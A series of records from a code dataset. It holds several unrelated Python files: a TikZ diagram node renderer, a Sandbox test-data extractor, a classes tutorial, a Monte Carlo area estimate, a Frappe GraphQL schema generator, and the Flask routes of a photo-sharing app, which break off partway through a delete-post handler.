__repr__(self):\n return '' % (self.text,)\n\n def append(self, tnode):\n self._text += '\\n' + tnode.text\n\n def parse(self, nodes, grid, row, col):\n super(TransitionText, self).parse(nodes, grid, row, col)\n try:\n # currently transition texts must be next to each other (no extra\n # new lines)\n prevtext = grid[row - 1][col]\n if isinstance(prevtext, TransitionText):\n prevtext.append(self)\n # remove from dag list since we're appending\n if self in nodes:\n nodes.remove(self)\n except IndexError:\n # find the previous, longest row of nodes so that we can center the\n # double down arrow\n longrow = prevrow = []\n for r in xrange(row - 1, -1, -1):\n prevrow = [e for e in grid[r] if e]\n if len(prevrow) > len(longrow):\n longrow = prevrow\n c = len(longrow)\n self.middle = [longrow[c / 2]]\n if not isinstance(self.middle, Node):\n self.middle = [longrow[c / 2 - 1], longrow[c / 2 + 1]]\n\n def tikz(self, outfile):\n anchor = r'($(%s.south)$)' % self.middle[0]\n if len(self.middle) > 1:\n anchor = r'$.5*(%s.south) + .5*(%s.south)$' % (self.middle[0],\n self.middle[1])\n\n lines = self.text.splitlines()\n # the first line is a command, the rest are subtexts\n lines[0] = r'\\small{\\texttt{%s}}' % lines[0]\n for i in xrange(1, len(lines)):\n lines[i] = r'\\scriptsize\\emph{%s}' % lines[i]\n print('\\\\draw[line width=5pt, -{Latex[length=7mm]}, draw=gray!80] '\n '(%s,%.2f) -- node[midway, anchor=west, align=left] (%s) {%s} '\n '++(0,%.2f);' % (anchor, -(self.row - 1), self,\n '\\\\\\\\'.join(lines), -(len(lines) + 1.5)),\n file=outfile)\n\n # print second arrow ontop of the first to produce an outlined arrow\n print('\\\\draw [line width=3pt, -{Latex[length=5mm]}, draw=white] '\n '(%s,%.2f) -- ++(0,%.2f);' % (anchor, -(self.row - 1),\n -(len(lines) + 1.35)),\n file=outfile)\n\n\nclass Style(dict):\n def __repr__(self):\n return '' % (dict.__repr__(self),)\n\n def parse(self, dag, grid, row, col):\n if 'node' not in self:\n raise DAGSyntaxError(row, col, 'style found but no node specified')\n\n for n in dag:\n if self['node'] == 'global' or n.name == self['node']:\n n._style = self\n","repo_name":"seanfarley/asciidag","sub_path":"_extensions/dagmatic/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33701405752","text":"import shutil\nimport os.path\n\nfrom sandbox import sdk2\nfrom sandbox.projects import resource_types\n\n\nclass UserdataTestDataExtractor(sdk2.Task):\n class Parameters(sdk2.Parameters):\n build_output = sdk2.parameters.Resource(\n 'Build output with test results',\n required=True,\n resource_type=resource_types.BUILD_OUTPUT\n )\n target = sdk2.parameters.String(\n 'Target name to find resources',\n required=True\n )\n index_fragment = sdk2.parameters.String(\n 'When provided, create index fragment resource from with path suffix',\n required=False\n )\n\n def get_test_output(self):\n src_data = sdk2.ResourceData(self.Parameters.build_output)\n return os.path.join(str(src_data.path), self.Parameters.target, \"test-results\", \"pytest\", \"testing_out_stuff\")\n\n def create_tables_archive(self):\n resource = resource_types.USERDATA_TABLES_ARCHIVE(self, \"Tables archive with test data\", \"tables\")\n resource.tables_prefix = \"sandbox/\"\n dst_data = sdk2.ResourceData(resource)\n shutil.copytree(os.path.join(self.get_test_output(), \"tables_dump\"), str(dst_data.path))\n dst_data.ready()\n\n def create_index_fragment(self):\n resource = resource_types.USERDATA_INDEX_FRAGMENT(self, \"Index fragment with test data\", \"index_fragment\")\n dst_data = sdk2.ResourceData(resource)\n\n def ignore_func(src, names):\n return [n for n in names if n in [\"bin\", \"scripts\"]]\n\n shutil.copytree(os.path.join(self.get_test_output(), str(self.Parameters.index_fragment)), str(dst_data.path), ignore=ignore_func)\n\n dst_data.ready()\n\n def on_execute(self):\n self.create_tables_archive()\n if self.Parameters.index_fragment:\n self.create_index_fragment()\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"sandbox/TestDataExtractor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27306530620","text":"# Contents:\n# Class Syntax\n# Classier Classes\n# Let's Not Get Too Selfish\n# Instantiating Your First Object\n# More on __init__() and self\n# Class Scope\n# A Methodical Approach\n# They're Multiplying!\n# It's Not All Animals and Fruits\n# Warning: Here Be Dragons\n# Inheritance Syntax\n# Override!\n# This Looks Like a Job For...\n# Class Basics\n# Class It Up\n# Instantiate an Object\n# Inheritance\n\nprint(\"### Class Syntax ###\")\n# class Animal(object):\n# pass\n\nprint(\"### Classier Classes ###\")\n# class Animal(object):\n# def __init__(self):\n# pass\n\nprint(\"### Let's Not Get Too Selfish ###\")\n# class Animal(object):\n# def __init__(self, name):\n# self.name = name\n\nprint(\"### Instantiating Your First Object ###\")\n# class Animal(object):\n# def __init__(self, name):\n# self.name = name\n#\n# zebra = Animal(\"Jeffrey\")\n#\n# print(zebra.name)\n\nprint(\"### More on __init__() and self ###\")\n# class Animal(object):\n# \"\"\"Makes cute animals.\"\"\"\n# def __init__(self, name, age, is_hungry):\n# self.name = name\n# self.age = age\n# self.is_hungry = is_hungry\n#\n# zebra = Animal(\"Jeffrey\", 2, True)\n# giraffe = Animal(\"Bruce\", 1, False)\n# panda = Animal(\"Chad\", 7, True)\n#\n# print(zebra.name, zebra.age, zebra.is_hungry)\n# print(giraffe.name, giraffe.age, giraffe.is_hungry)\n# print(panda.name, panda.age, panda.is_hungry)\n\nprint(\"### Class Scope ###\")\n# class Animal(object):\n# \"\"\"Makes cute animals.\"\"\"\n# is_alive = True\n# def __init__(self, name, age):\n# self.name = name\n# self.age = age\n#\n# zebra = Animal(\"Jeffrey\", 2)\n# giraffe = Animal(\"Bruce\", 1)\n# panda = Animal(\"Chad\", 7)\n#\n# print(zebra.name, zebra.age, zebra.is_alive)\n# print(giraffe.name, giraffe.age, giraffe.is_alive)\n# print(panda.name, panda.age, panda.is_alive)\n\nprint(\"### A Methodical Approach ###\")\n# class Animal(object):\n# \"\"\"Makes cute animals.\"\"\"\n# is_alive = True\n#\n# def __init__(self, name, age):\n# self.name = name\n# self.age = age\n#\n# def description(self):\n# print(self.name)\n# print(self.age)\n#\n# hippo = Animal(\"Anderson\", 36)\n# hippo.description()\n\nprint(\"### They're Multiplying! ###\")\nclass Animal(object):\n \"\"\"Makes cute animals.\"\"\"\n is_alive = True\n health = \"good\"\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def description(self):\n print(self.name)\n print(self.age)\n\nhippo = Animal('Anderson', 36)\nsloth = Animal('Dale', 15)\nocelot = Animal('Fuzzy', 7)\n\nprint(hippo.health)\nprint(sloth.health)\nprint(ocelot.health)\n\nprint(\"### It's Not All Animals and Fruits ###\")\nclass ShoppingCart(object):\n \"\"\"Creates shopping cart objects\n for users of our fine website.\"\"\"\n\n def __init__(self, customer_name):\n self.customer_name = customer_name\n self.items_in_cart = {}\n\n def add_item(self, product, price):\n \"\"\"Add product to the cart.\"\"\"\n if not product in self.items_in_cart:\n self.items_in_cart[product] = price\n print(product + \" added.\")\n else:\n print(product + \" is already in the cart.\")\n\n def remove_item(self, product):\n \"\"\"Remove product from the cart.\"\"\"\n if product in self.items_in_cart:\n del self.items_in_cart[product]\n print(product + \" removed.\")\n else:\n print(product + \" is not in the cart.\")\n\nmy_cart = ShoppingCart(\"Eric\")\nmy_cart.add_item(\"Ukelele\", 10)\n\nprint(\"### Warning: Here Be Dragons ###\")\nclass Customer(object):\n \"\"\"Produces objects that represent customers.\"\"\"\n def __init__(self, customer_id):\n self.customer_id = customer_id\n\n def display_cart(self):\n print(\"I'm a string that stands in for the contents of your shopping cart!\")\n\nclass ReturningCustomer(Customer):\n \"\"\"For customers of the repeat variety.\"\"\"\n def display_order_history(self):\n print(\"I'm a string that stands in for your order history!\")\n\nmonty_python = ReturningCustomer(\"ID: 12345\")\nmonty_python.display_cart()\nmonty_python.display_order_history()\n\nprint(\"### Inheritance Syntax ###\")\nclass Shape(object):\n \"\"\"Makes shapes!\"\"\"\n def __init__(self, number_of_sides):\n self.number_of_sides = number_of_sides\n\nclass Triangle(Shape):\n def __init__(self, side1, side2, side3):\n self.side1 = side1\n self.side2 = side2\n self.side3 = side3\n\nprint(\"### Override! ###\")\nclass Employee(object):\n \"\"\"Models real-life employees!\"\"\"\n def __init__(self, employee_name):\n self.employee_name = employee_name\n\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 20.00\n\nclass PartTimeEmployee(Employee):\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 12.00\n\nprint(\"### This Looks Like a Job For... ###\")\nclass Employee(object):\n \"\"\"Models real-life employees!\"\"\"\n def __init__(self, employee_name):\n self.employee_name = employee_name\n\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 20.00\n\nclass PartTimeEmployee(Employee):\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 12.00\n\n def full_time_wage(self, hours):\n return super(PartTimeEmployee, self).calculate_wage(hours)\n\nmilton = PartTimeEmployee('Milton')\nprint(milton.full_time_wage(10))\n\nprint(\"### Class Basics ###\")\nclass Triangle(object):\n def __init__(self, angle1, angle2, angle3):\n self.angle1 = angle1\n self.angle2 = angle2\n self.angle3 = angle3\n\nprint(\"### Class It Up ###\")\n# class Triangle(object):\n# number_of_sides = 3\n#\n# def __init__(self, angle1, angle2, angle3):\n# self.angle1 = angle1\n# self.angle2 = angle2\n# self.angle3 = angle3\n#\n# def check_angles(self):\n# if (self.angle1 + self.angle2 + self.angle3) == 180:\n# return True\n# else:\n# return False\n\nprint(\"### Instantiate an Object ###\")\n# class Triangle(object):\n# number_of_sides = 3\n#\n# def __init__(self, angle1, angle2, angle3):\n# self.angle1 = angle1\n# self.angle2 = angle2\n# self.angle3 = angle3\n#\n# def check_angles(self):\n# if (self.angle1 + self.angle2 + self.angle3) == 180:\n# return True\n# else:\n# return False\n#\n# my_triangle = Triangle(30, 60, 90)\n#\n# print(my_triangle.number_of_sides)\n# print(my_triangle.check_angles())\n\nprint(\"### Inheritance ###\")\nclass Triangle(object):\n number_of_sides = 3\n\n def __init__(self, angle1, angle2, angle3):\n self.angle1 = angle1\n self.angle2 = angle2\n self.angle3 = angle3\n\n def check_angles(self):\n if (self.angle1 + self.angle2 + self.angle3) == 180:\n return True\n else:\n return False\n\nclass Equilateral(Triangle):\n angle = 60\n\n def __init__(self):\n self.angle1 = self.angle\n self.angle2 = self.angle\n self.angle3 = self.angle","repo_name":"AlexeyShpavda/LearningPython","sub_path":"18)IntroductionToClasses.py","file_name":"18)IntroductionToClasses.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21502363424","text":"'''\nDescripttion: \nVersion: 1.0\nAuthor: ZhangHongYu\nDate: 2021-05-22 21:15:21\nLastEditors: ZhangHongYu\nLastEditTime: 2021-05-22 21:19:19\n'''\nimport random\nn= 10000\ncnt = 0\nfor i in range(n):\n x = random.random() \n y = random.random()\n if 4*(2*x-1)**4+8*(2*y-1)**8 < 1 + 2*(2*y-1)**3*(3*x-2)**2: #注意python连乘性和优先级\n cnt += 1\nprint(\"面积近似值为:\", cnt/n)","repo_name":"orion-orion/NumericalAnalysis-Python","sub_path":"chapter9.随机数和应用/蒙特卡洛2型问题-随机数近似图形面积.py","file_name":"蒙特卡洛2型问题-随机数近似图形面积.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"21786521575","text":"import re\nimport inflect\n\nimport frappe\nfrom frappe.utils import cint\nfrom frappe.model import default_fields, display_fieldtypes, table_fields\nfrom frappe.model.meta import Meta\n\n\ndef get_doctype_sdl(doctype, options):\n \"\"\"\n options = dict(\n disable_enum_select_fields=False,\n ignore_custom_fields=False\n )\n \"\"\"\n generated_enums = frappe._dict()\n\n meta = frappe.get_meta(doctype)\n sdl, defined_fieldnames = get_basic_doctype_sdl(meta, options=options, generated_enums=generated_enums)\n\n # Extend Doctype with Custom Fields\n if not options.ignore_custom_fields and len(meta.get_custom_fields()):\n sdl += get_custom_field_sdl(meta, defined_fieldnames, options=options)\n\n if not options.disable_enum_select_fields:\n sdl += get_select_docfield_enums(meta=meta, options=options, generated_enums=generated_enums)\n\n if not meta.istable:\n\n # DocTypeSortingInput\n if not meta.issingle:\n sdl += get_sorting_input(meta)\n sdl += get_connection_type(meta)\n\n # Extend QueryType\n sdl += get_query_type_extension(meta)\n\n return sdl\n\n\ndef get_basic_doctype_sdl(meta: Meta, options: dict, generated_enums=None):\n dt = format_doctype(meta.name)\n sdl = f\"type {dt} implements BaseDocType {{\"\n\n defined_fieldnames = [] + list(default_fields)\n\n for field in default_fields:\n if field in (\"idx\", \"docstatus\"):\n fieldtype = \"Int\"\n elif field in (\"owner\", \"modified_by\"):\n fieldtype = \"User!\"\n elif field == \"parent\":\n fieldtype = \"BaseDocType\"\n else:\n fieldtype = \"String\"\n sdl += f\"\\n {field}: {fieldtype}\"\n sdl += \"\\n owner__name: String!\"\n sdl += \"\\n modified_by__name: String!\"\n sdl += \"\\n parent__name: String\"\n\n for field in meta.fields:\n if field.fieldtype in display_fieldtypes:\n continue\n if field.fieldname in defined_fieldnames:\n continue\n if cint(field.get(\"is_custom_field\")):\n continue\n defined_fieldnames.append(field.fieldname)\n sdl += f\"\\n {get_field_sdl(meta, field, options=options, generated_enums=generated_enums)}\"\n if field.fieldtype in (\"Link\", \"Dynamic Link\"):\n sdl += f\"\\n {get_link_field_name_sdl(field)}\"\n\n sdl += \"\\n}\"\n\n return sdl, defined_fieldnames\n\n\ndef get_custom_field_sdl(meta, defined_fieldnames, options):\n sdl = f\"\\n\\nextend type {format_doctype(meta.name)} {{\"\n for field in meta.get_custom_fields():\n if field.fieldtype in display_fieldtypes:\n continue\n if field.fieldname in defined_fieldnames:\n continue\n defined_fieldnames.append(field.fieldname)\n sdl += f\"\\n {get_field_sdl(meta, field, options=options)}\"\n if field.fieldtype in (\"Link\", \"Dynamic Link\"):\n sdl += f\"\\n {get_link_field_name_sdl(field)}\"\n sdl += \"\\n}\"\n\n return sdl\n\n\ndef get_select_docfield_enums(meta, options, generated_enums=None):\n sdl = \"\"\n for field in meta.get(\"fields\", {\"fieldtype\": \"Select\"}):\n\n has_no_options = all([len(x or \"\") == 0 for x in (field.options or \"\").split(\"\\n\")])\n\n has_invalid_options = False\n if any([\n contains_reserved_characters(option)\n for option in (field.options or \"\").split(\"\\n\")\n ]):\n has_invalid_options = True\n\n if (options.ignore_custom_fields and cint(field.get(\"is_custom_field\"))) \\\n or has_no_options \\\n or has_invalid_options:\n continue\n\n sdl += \"\\n\\n\"\n sdl += f\"enum {get_select_docfield_enum_name(meta.name, field, generated_enums)} {{\"\n for option in (field.get(\"options\") or \"\").split(\"\\n\"):\n if not option or not len(option):\n continue\n sdl += f\"\\n {frappe.scrub(option).upper()}\"\n\n sdl += \"\\n}\"\n\n return sdl\n\n\ndef get_sorting_input(meta):\n dt = format_doctype(meta.name)\n\n sdl = f\"\\n\\nenum {dt}SortField {{\"\n sdl += \"\\n NAME\"\n sdl += \"\\n CREATION\"\n sdl += \"\\n MODIFIED\"\n for field in meta.fields:\n if not field.search_index and not field.unique:\n continue\n sdl += f\"\\n {field.fieldname.upper()}\"\n sdl += \"\\n}\"\n\n sdl += f\"\\n\\ninput {dt}SortingInput {{\"\n sdl += \"\\n direction: SortDirection!\"\n sdl += f\"\\n field: {dt}SortField!\"\n sdl += \"\\n}\"\n return sdl\n\n\ndef get_connection_type(meta):\n dt = format_doctype(meta.name)\n sdl = f\"\\n\\ntype {dt}CountableEdge {{\"\n sdl += \"\\n cursor: String!\"\n sdl += f\"\\n node: {dt}!\"\n sdl += \"\\n}\"\n\n sdl += f\"\\n\\ntype {dt}CountableConnection {{\"\n sdl += \"\\n pageInfo: PageInfo!\"\n sdl += \"\\n totalCount: Int\"\n sdl += f\"\\n edges: [{dt}CountableEdge!]!\"\n sdl += \"\\n}\"\n\n return sdl\n\n\ndef get_query_type_extension(meta: Meta):\n dt = format_doctype(meta.name)\n sdl = \"\\n\\nextend type Query {\"\n if meta.issingle:\n sdl += f\"\\n {dt}: {dt}!\"\n else:\n plural = get_plural(meta.name)\n if plural == meta.name:\n prefix = \"A\"\n if dt[0].lower() in (\"a\", \"e\", \"i\", \"o\", \"u\"):\n prefix = \"An\"\n\n sdl += f\"\\n {prefix}{dt}(name: String!): {dt}!\"\n else:\n sdl += f\"\\n {dt}(name: String!): {dt}!\"\n\n plural_dt = format_doctype(plural)\n sdl += f\"\\n {plural_dt}(filter: [DBFilterInput], sortBy: {dt}SortingInput, \"\n sdl += \"before: String, after: String, \"\n sdl += f\"first: Int, last: Int): {dt}CountableConnection!\"\n\n sdl += \"\\n}\\n\"\n return sdl\n\n\ndef get_field_sdl(meta, docfield, options: dict, generated_enums: list = None):\n return f\"{docfield.fieldname}: {get_graphql_type(meta, docfield, options=options, generated_enums=generated_enums)}\"\n\n\ndef get_link_field_name_sdl(docfield):\n return f\"{docfield.fieldname}__name: String\"\n\n\ndef get_graphql_type(meta, docfield, options: dict, generated_enums=None):\n string_fieldtypes = [\n \"Small Text\", \"Long Text\", \"Code\", \"Text Editor\", \"Markdown Editor\", \"HTML Editor\",\n \"Date\", \"Datetime\", \"Time\", \"Text\", \"Data\", \"Rating\", \"Read Only\",\n \"Attach\", \"Attach Image\", \"Signature\", \"Color\", \"Barcode\", \"Geolocation\", \"Duration\"\n ]\n int_fieldtypes = [\"Int\", \"Long Int\", \"Check\"]\n float_fieldtypes = [\"Currency\", \"Float\", \"Percent\"]\n\n if options.disable_enum_select_fields:\n string_fieldtypes.append(\"Select\")\n\n graphql_type = None\n if docfield.fieldtype in string_fieldtypes:\n graphql_type = \"String\"\n elif docfield.fieldtype in int_fieldtypes:\n graphql_type = \"Int\"\n elif docfield.fieldtype in float_fieldtypes:\n graphql_type = \"Float\"\n elif docfield.fieldtype == \"Link\":\n graphql_type = f\"{format_doctype(docfield.options)}\"\n elif docfield.fieldtype == \"Dynamic Link\":\n graphql_type = \"BaseDocType\"\n elif docfield.fieldtype in table_fields:\n graphql_type = f\"[{format_doctype(docfield.options)}!]!\"\n elif docfield.fieldtype == \"Password\":\n graphql_type = \"Password\"\n elif docfield.fieldtype == \"Select\":\n graphql_type = get_select_docfield_enum_name(meta.name, docfield, generated_enums)\n\n # Mark NonNull if there is no empty option and is required\n has_empty_option = all([len(x or \"\") == 0 for x in (docfield.options or \"\").split(\"\\n\")])\n\n has_invalid_options = False\n if any([\n contains_reserved_characters(option)\n for option in (docfield.options or \"\").split(\"\\n\")\n ]):\n has_invalid_options = True\n\n if has_empty_option or has_invalid_options:\n graphql_type = \"String\"\n if docfield.reqd:\n graphql_type += \"!\"\n else:\n frappe.throw(f\"Invalid fieldtype: {docfield.fieldtype}\")\n\n if docfield.reqd and graphql_type[-1] != \"!\":\n graphql_type += \"!\"\n\n return graphql_type\n\n\ndef get_plural(doctype):\n p = inflect.engine()\n return p.plural(doctype)\n\n\ndef format_doctype(doctype):\n return remove_reserved_characters(doctype.replace(\" \", \"\").replace(\"-\", \"_\"))\n\n\ndef get_select_docfield_enum_name(doctype, docfield, generated_enums=None):\n\n name = remove_reserved_characters(\n f\"{doctype}{(docfield.label or docfield.fieldname).title()}SelectOptions\"\n .replace(\" \", \"\"))\n\n if hasattr(generated_enums,'values'):\n if name in generated_enums.values():\n name = remove_reserved_characters(\n f\"{doctype}{(docfield.fieldname).title()}SelectOptions\"\n .replace(\" \", \"\"))\n\n if generated_enums is not None:\n if docfield in generated_enums:\n name = generated_enums[docfield]\n else:\n generated_enums[docfield] = name\n\n return name\n\n\ndef remove_reserved_characters(string):\n return re.sub(r\"[^A-Za-z0-9_ ]\", \"\", string)\n\n\ndef contains_reserved_characters(string):\n if not string:\n return False\n\n matches = re.match(r\"^[A-Za-z_ ][A-Za-z0-9_ ]*$\", string)\n if matches:\n return False\n else:\n return True\n","repo_name":"leam-tech/frappe_graphql","sub_path":"frappe_graphql/utils/generate_sdl/doctype.py","file_name":"doctype.py","file_ext":"py","file_size_in_byte":9102,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"66"} +{"seq_id":"29408655403","text":"from app import app, db\nfrom flask import Flask, render_template, url_for, request, flash, redirect, send_from_directory\nfrom flask_login import login_required, current_user, login_user, logout_user\nfrom werkzeug.urls import url_parse\nfrom werkzeug.utils import secure_filename\nfrom app.models import User, Post, Comment\nfrom app.forms import LoginForm, RegistrationForm, EditProfile, EmptyForm\nimport os\n\n@app.shell_context_processor\ndef make_shell_context():\n\treturn {'db': db, 'User': User, \"Post\": Post, \"Comment\": Comment}\n\n@app.route('/', methods=[\"GET\", \"POST\"])\n@app.route('/index', methods=[\"GET\", \"POST\"])\n@login_required\ndef index():\n\tform = EmptyForm()\n\tall_users = User.query.all()\n\tall_posts_all_users = []\n\tfor user in all_users:\n\t\tuser_posts_query = user.posts\n\t\tfor post in user_posts_query:\n\t\t\tall_posts_all_users.append(post)\n\t'''\n\tfor post in all_posts_all_users:\n\t\tprint(\"post id {}\".format(post.id))\n\t\tprint(\"post image_url {}\".format(post.image_url))\n\t\tprint(\"post author {}\".format(post.author))\n\t\tprint(\"post timestamp {}\".format(post.timestamp))'''\n\n\treturn render_template('index.html', all_posts_all_users=all_posts_all_users, form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('index'))\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=form.username.data).first()\n\t\tif user is None or not user.check_password(form.password.data):\n\t\t\tflash('Invalid username or password', category=\"error\")\n\t\t\treturn redirect(url_for('login'))\n\t\tlogin_user(user, remember=form.remember_me.data)\n\t\tnext_page = request.args.get('next')\n\t\tif not next_page or url_parse(next_page).netloc != '':\n\t\t\tnext_page = url_for('index')\n\t\treturn redirect(next_page)\n\treturn render_template('login.html', title='Sign In', form=form)\n\n@app.route('/logout')\ndef logout():\n\tlogout_user()\n\treturn redirect(url_for('index'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('index'))\n\tform = RegistrationForm()\n\tif form.validate_on_submit():\n\t\tuser = User(username=form.username.data, \n\t\t\t\t\temail=form.email.data, \n\t\t\t\t\tfirstname=form.firstname.data,\n\t\t\t\t\tlastname=form.lastname.data,\n\t\t\t\t\tbio=form.bio.data,\n\t\t\t\t\twebsite=form.website.data)\n\t\tuser.set_password(form.password.data)\n\t\tdb.session.add(user)\n\t\tdb.session.commit()\n\t\tflash('Account Created!')\n\t\treturn redirect(url_for('upload_avatar'))\n\treturn render_template('register.html', title='Register', form=form)\n\n@app.route('/upload_avatar', methods=['GET','POST'])\n@login_required\ndef upload_avatar():\n\tif request.method == 'post':\n\t\treturn redirect('avatar_upload', )\n\treturn render_template('upload_avatar.html')\n\n@app.route('/newpost', methods=['POST'])\n@login_required\ndef newpost():\n\t#--- Image Upload ---#\n\tdef allowed_file(filename):\n\t\treturn '.' in filename and \\\n\t\t\tfilename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\t\n\tbasedir = os.path.abspath(os.path.dirname(__file__))\n\t\n\t# check if the post request has the file part\n\tif 'file' not in request.files:\n\t\tflash('No file part')\n\t\treturn redirect(request.url)\n\tfile = request.files['file']\n\t\n\t# If the user does not select a file, the browser submits an\n\t# empty file without a filename.\n\tif file.filename == '':\n\t\tflash('No selected file')\n\t\treturn redirect(request.url)\n\t\n\t# Upload file to static\n\tif file and allowed_file(file.filename):\n\t\tfilename = secure_filename(file.filename)\n\t\tfile.save(os.path.join(basedir + app.config['UPLOAD_FOLDER']) + filename)\n\n\t\t# Add post to db\n\t\tcaption_text = request.form['caption_text']\n\t\timage_url = \"./static/images/\" + filename\n\t\tnew_post = Post(image_url=image_url, caption=caption_text, author=current_user)\n\t\tdb.session.add(new_post)\n\t\tdb.session.commit()\n\t\t\n\t\t# Add tags to db\n\t\tflash('You Post Has Been Created! ')\n\t\t#return redirect(url_for('new_post_caption'), image_url=image_url)\n\t\tusername=current_user.username\n\t\treturn redirect(url_for('user', username=username))\n\t\n\telse:\n\t\tflash('There was a problem with your upload - please try again')\n\t\treturn redirect(url_for('index'))\n\n@app.route('/new_comment', methods=[\"POST\"])\n@login_required\ndef new_comment():\n\tform = request.form\n\tcomment_text = form['comment_text']\n\tpost_id = form['post_id']\n\t#print('POST ID: {}'.format(post_id))\n\tpost = Post.query.get(post_id)\n\n\tnew_comment = Comment(body=comment_text, user_id=current_user.id, post_id=post_id)\n\tdb.session.add(new_comment)\n\tdb.session.commit()\n\tflash('Your comment has been added! ')\n\treturn redirect(url_for('index'))\n\n@app.route('/')\n@login_required\ndef user(username):\n\tform = EmptyForm()\n\tuser = User.query.filter_by(username=username).first_or_404()\n\tposts = user.posts\n\t\n\tnum_followers = len(user.followers.all())\n\tnum_following = len(user.following.all())\n\tnum_posts = len(user.posts.all())\n\n\tfollowers = user.followers.all()\n\tfollowing = user.following.all()\n\t\n\treturn render_template('user.html', user=user, posts=user.posts, form=form, \n\t\tnum_followers=num_followers, num_following=num_following, num_posts=num_posts,\n\t\tfollowers=followers, following=following)\n\n@app.route('/edit_profile', methods=[\"GET\",\"POST\"])\n@login_required\ndef edit_profile():\n\tuser = User.query.filter_by(username=current_user.username).first_or_404()\n\tform = EditProfile()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=current_user.username).first()\n\t\tif form.username.data != \"\":\n\t\t\tuser.username = form.username.data\n\t\tif form.email.data != \"\":\n\t\t\tuser.email = form.email.data\n\t\tif form.firstname.data != \"\":\n\t\t\tuser.firstname = form.firstname.data\n\t\tif form.lastname.data != \"\":\n\t\t\tuser.lastname = form.lastname.data\n\t\tif form.website.data != \"\":\n\t\t\tuser.website = form.website.data\n\t\tif form.bio.data != \"\":\n\t\t\tuser.bio = form.bio.data\n\t\tdb.session.commit()\n\t\tflash('Profile Successfully Updated!')\n\t\treturn redirect(url_for('user', username=current_user.username))\n\telif request.method == \"get\":\n\t\tform.email.data = current_user.email \n\t\tform.firstname.data = current_user.firstname\n\t\tform.lastname.data = current_user.lastname\n\t\tform.website.data = current_user.website\n\t\tform.bio.data = current_user.bio\n\treturn render_template('edit_profile.html', title='Edit Profile', form=form)\n\n@app.route('/avatar_upload', methods=['POST'])\n@login_required\ndef avatar_upload():\n\tdef allowed_file(filename):\n\t\treturn '.' in filename and \\\n\t\t\tfilename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\t\n\tbasedir = os.path.abspath(os.path.dirname(__file__))\n\t\n\t# check if the post request has the file part\n\tif 'file' not in request.files:\n\t\tflash('No file part')\n\t\treturn redirect(url_for('user', username=current_user.username))\n\tfile = request.files['file']\n\t\n\t# If the user does not select a file, the browser submits an\n\t# empty file without a filename.\n\tif file.filename == '':\n\t\tflash('No selected file')\n\t\treturn redirect(url_for('user', username=current_user.username))\n\t\n\t# Upload file to static\n\tif file and allowed_file(file.filename):\n\t\tfilename = secure_filename(file.filename)\n\t\tfile.save(os.path.join(basedir + app.config['AVATAR_UPLOAD_FOLDER']) + filename)\n\n\t\t# Add post to db\n\t\timage_url = app.config['AVATAR_UPLOAD_FOLDER'] + filename\n\t\tcurrent_user.avatar_url = image_url\n\t\tdb.session.add(current_user)\n\t\tdb.session.commit()\n\t\t\n\t\tflash('Your profile photo has been updated!' )\n\t\treturn redirect(url_for('user', username=current_user.username))\n\t\n\telse:\n\t\tflash('There was a problem with your upload - please try again')\n\t\treturn redirect(url_for('index'))\n\n@app.route('/delete_avatar', methods=[\"POST\"])\n@login_required\ndef delete_avatar():\n\tflash('Your profile photo has been deleted!')\n\tdefault_avatar_url = app.config['DEFAULT_AVATAR_URL']\n\t# TODO delete old avatar\n\tcurrent_user.avatar_url = default_avatar_url\n\tdb.session.add(current_user)\n\tdb.session.commit()\n\treturn redirect(url_for('user', username=current_user.username))\n\n@app.route('/follow/', methods=['POST'])\n@login_required\ndef follow(username):\n\tform = EmptyForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=username).first()\n\t\tif user is None:\n\t\t\tflash('User {} not found.'.format(username))\n\t\t\treturn redirect(url_for('index'))\n\t\tif user == current_user:\n\t\t\tflash('You cannot follow yourself!')\n\t\t\treturn redirect(url_for(username))\n\t\tcurrent_user.follow(user)\n\t\tdb.session.commit()\n\t\tflash('You are following {}!'.format(username))\n\t\treturn redirect(url_for('user', username=user.username))\n\telse:\n\t\treturn redirect(url_for('index'))\n\n@app.route('/unfollow/', methods=['POST'])\n@login_required\ndef unfollow(username):\n\tform = EmptyForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=username).first()\n\t\tif user is None:\n\t\t\tflash('User {} not found.'.format(username))\n\t\t\treturn redirect(url_for('index'))\n\t\tif user == current_user:\n\t\t\tflash('You cannot unfollow yourself!')\n\t\t\treturn redirect(url_for(username))\n\t\tcurrent_user.unfollow(user)\n\t\tdb.session.commit()\n\t\tflash('You are not following {}.'.format(username))\n\t\treturn redirect(url_for('user', username=user.username))\n\telse:\n\t\treturn redirect(url_for('index'))\n\n\n@app.route('/delete_post', methods=[\"POST\"])\n@login_required\ndef delete_post():\n\t# TODO\n\tprint(\"Post ID: {}\".format(request.form[\"post_id\"]))\n\tpost_id = request.form['post_id']\n\t# TODO this will need much more work\n\tpost = Post.query.filter_by(id=post_id).first()\n\t#print(\"Post: 